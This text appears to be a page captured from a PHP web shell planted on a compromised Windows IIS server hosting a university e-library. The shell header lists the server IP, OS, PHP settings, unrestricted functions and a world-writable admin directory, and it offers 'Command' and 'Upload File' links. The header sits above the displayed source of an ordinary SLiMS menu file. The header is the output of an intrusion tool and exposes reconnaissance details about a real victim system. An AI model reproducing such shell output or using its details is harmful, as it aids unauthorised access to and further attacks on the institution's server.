Server IP : 103.11.96.170 / Your IP : 3.145.170.67 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/elibrary/admin/modules/master_file/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Master File module submenu items */ // IP based access limitation do_checkIP('smc'); do_checkIP('smc-masterfile'); $menu[] = array('Header', __('Authority Files')); $menu[] = array(__('GMD'), MWB.'master_file/index.php', __('General Material Designation')); $menu[] = array(__('Content Type'), MWB.'master_file/rda_cmc.php?type=content', __('RDA Content Type')); $menu[] = array(__('Media Type'), MWB.'master_file/rda_cmc.php?type=media', __('RDA Media Type')); $menu[] = array(__('Carrier Type'), MWB.'master_file/rda_cmc.php?type=carrier', __('RDA Carrier Type')); $menu[] = array(__('Publisher'), MWB.'master_file/publisher.php', __('Document Publisher')); $menu[] = array(__('Supplier'), MWB.'master_file/supplier.php', __('Item Supplier')); $menu[] = array(__('Author'), MWB.'master_file/author.php', __('Document Authors')); $menu[] = array(__('Subject'), MWB.'master_file/topic.php', __('Subject')); $menu[] = array(__('Location'), MWB.'master_file/location.php', __('Item Location')); $menu[] = array('Header', __('Lookup Files')); $menu[] = array(__('Place'), MWB.'master_file/place.php', __('Place Name')); $menu[] = array(__('Item Status'), MWB.'master_file/item_status.php', __('Item Status')); $menu[] = array(__('Collection Type'), MWB.'master_file/coll_type.php', __('Collection Type')); $menu[] = array(__('Doc. Language'), MWB.'master_file/doc_language.php', __('Document Content Language')); $menu[] = array(__('Label'), MWB.'master_file/label.php', __('Special Labels for Titles to Show Up On Homepage')); $menu[] = array(__('Frequency'), MWB.'master_file/frequency.php', __('Frequency')); $menu[] = array('Header', __('Tools')); $menu[] = array(__('Cataloging Servers'), MWB.'master_file/p2pservers.php', __('List of available Copy Cataloging Servers')); $menu[] = array(__('Item Code Pattern'), MWB.'master_file/item_code_pattern.php', __('Manage item code pattern')); $menu[] = array(__('Orphaned Author'), MWB.'master_file/author.php?type=orphaned', __('Orphaned Authors')); $menu[] = array(__('Orphaned Subject'), MWB.'master_file/topic.php?type=orphaned', __('Orphaned Subject')); $menu[] = array(__('Orphaned Publisher'), MWB.'master_file/publisher.php?type=orphaned', __('Orphaned Publisher')); $menu[] = array(__('Orphaned Place'), MWB.'master_file/place.php?type=orphaned', __('Orphaned Place'));